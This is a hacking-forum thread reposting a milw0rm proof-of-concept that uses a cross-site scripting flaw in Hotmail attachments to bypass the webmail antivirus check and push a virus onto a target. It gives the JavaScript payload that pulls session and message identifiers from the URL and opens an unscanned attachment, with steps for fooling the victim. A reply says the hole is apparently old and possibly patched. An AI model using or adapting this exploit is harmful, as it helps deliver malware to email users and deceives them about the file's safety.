Jump to content
Guest Nemessis

- HOTMAIL XSS and AV bypass exploit - presented by Tontonq

By Guest Nemessis, in Exploituri

Recommended Posts

Guest Nemessis

Guest Nemessis

Posted
Posted

- HOTMAIL XSS and AV bypass exploit -

To show a practical exploit of the XSS on Hotmail webmail server, let's do somethingdirty..., let's force the target user to do something that he would never had allowed:Downloading a virus (from Hotmail, of course):)I was thinking on some kind of mailbox access, but I needed ActiveX help, and some peoplecould think: "I do not allow ActiveX on my browser..." or "I run Mozilla...", etc.So the challenge has been to show how only with javascript, an XSS theoretically non

exploitable (no access to cookies), and some misconfiguration on Hotmail webmail can

result in a serious security problem.

1) I know XSS is present (on file attachments) (good)

2) No access to cookies from the code injected (bad)

3) Is not a flaw in input filtering, any script code is allowed (good)

4) I don't know if there is any kind of IP based session tracking method (bad)

5) Redirecting the output of forced client requests from the XSS code is possible (good)

6) The code to succefully exploit redirection (ActiveX, extended XML,...) is browser dependant (bad)

So at least the only room I have to play is Javascript (exploiting XSS only with HTML

injection doesn't seem to be effective in this case...).

If we take a look at the URL from where attachments are opened, we can see the session identifier

and message identifier.With this info we can build a request to... the same message we have sent?

Yes, yes, yes. The same message (same identifier) can have many attachments...

We can make a request to the same message but different attachment...

Why this??? Imagine that we could bypass the antivirus software only with a litle modification

of the HTTP request... We could not do this in the same attachment we send our XSS code, because

this is directly opened by the browser of the target, but we could still force a crafted request from

our XSS code to open a different attachment (on the same message) and without calling the AV software. :)

How to bypass the AV software...

This a sample URL to get an attachment from Hotmail.

http://by7fd.bay7.hotmail.msn.com/cg...ox=F000000001&

a=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&msg=MSGXXXXXXXX XX.XX&start=XXXXXXX& len=XXXX&mimepart=3&vscan=scan

"vscan=scan" ... ummm... Remove this, and the antivirus will not be called! Scared? Wait... :)

Now lets send to the target user a mail with two attachments. The first one whit this code:

---------------------------------------------------------------------------------------------

<html>

<script>

str1=document.URL

str2=str1.slice(55,110)

splitString = str2.split("&")

str3=splitString[0]+"&"+splitString[1]

window.open('http://by7fd.bay7.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a='+str3+'&mimepart=4')

</script>

</html>

----------------------------------------------------------------------------------------------

Notice that to make this code working on any enviroment, you will have to use ?splits?and not ?slices?. This is a proof of concept exploit. The only important thing is to extract user and message identifiers, no matter how you achieve this. If this code doesn?t work for you, try to change slice(X,Y).

The second attachment will be a virus testing file (for example EICAR).

Once the target opens the first attachment, the AV software will tell him that all it's OK, but

when he tries to download the file, it will be opened "online", the XSS code will be executed and:

-session ID and message ID will be retrieved

-a new window will be opened pointing to the second attachment, but without calling AV software

What can see the user?

He will see that he can download the file, without any AV warning, he will see that is downloading from

Hotmail.

An experienced user can notice that something strange it's happening... but still is possible to trick him by

opening a similar page to the one showed when the AV software is called... As always, now, the only limit is the imagination of the attacker.

Conclusions:

-XSS is present on Hotmail

-Hotmail Antivirus software can easily be bypassed exploiting this XSS

-Users of Hotmail are on high risk

XSS Screenshots:

http://www.infohacking.com/INFOHACKI...otmail_XSS.png

http://www.infohacking.com/INFOHACKI...otmail_XSS.png

http://www.infohacking.com/INFOHACKI...otmail_XSS.png

http://www.infohacking.com/INFOHACKI...otmail_XSS.png

http://www.infohacking.com/INFOHACKI...otmail_XSS.png

//Selametle kalin..

Credit - presented by Tontonq on milw0rm.com

Link to comment
Share on other sites
th0r Newbie

th0r

Posted
Posted
Nemessis wrote: Is a new post on milw0rm th0r. I don't know exactly how old is it.

Hmm ..

I found that website of: http://www.infohacking.com/INFOHACKING_RESEARCH/Our_Advisories/Hotmail/index.htm

Like 9 months / 1 year ago ..

Its pretty old though ..

As far as i can remember this thing is not working anymore ..

But i will try it again ..

Anyway thanks for reporting it Nemessis xD~~

I dont know if it is new in milw0rm xD~~

Thanks.

Th0R

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...